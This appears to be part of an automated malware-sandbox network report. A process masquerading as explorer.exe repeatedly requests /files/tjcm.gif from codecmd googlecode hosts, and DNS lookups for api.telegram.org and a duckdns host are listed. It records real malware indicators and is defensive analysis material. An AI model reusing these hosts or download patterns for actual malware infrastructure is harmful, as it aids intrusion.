Sep 2, 2024 14:24:08.405452967 CEST	1.1.1.1	192.168.2.5	0x5710	No error (0)	codecmd03.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 2, 2024 14:24:08.405452967 CEST	1.1.1.1	192.168.2.5	0x5710	No error (0)	googlecode.l.googleusercontent.com		74.125.71.82	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:25:21.943783045 CEST	1.1.1.1	192.168.2.5	0x14b4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:25:27.027792931 CEST	1.1.1.1	192.168.2.5	0x33a0	Server failure (2)	mariona.duckdns.org	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

codecmd01.googlecode.com

codecmd02.googlecode.com

codecmd03.googlecode.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:04.194107056 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:04.922636986 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:04 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:04.922653913 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:06.409231901 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:07.105370045 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:07 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:07.105393887 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:08.411746979 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:09.103180885 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:09 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:09.103200912 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:10.391468048 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:11.095881939 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:11.095935106 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49720	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:12.510562897 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:13.196974993 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:13 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:13.197010040 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:14.935251951 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:15.649697065 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:15 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:15.649722099 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:17.181340933 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:17.779237986 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:17 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:17.779797077 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:19.029438019 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
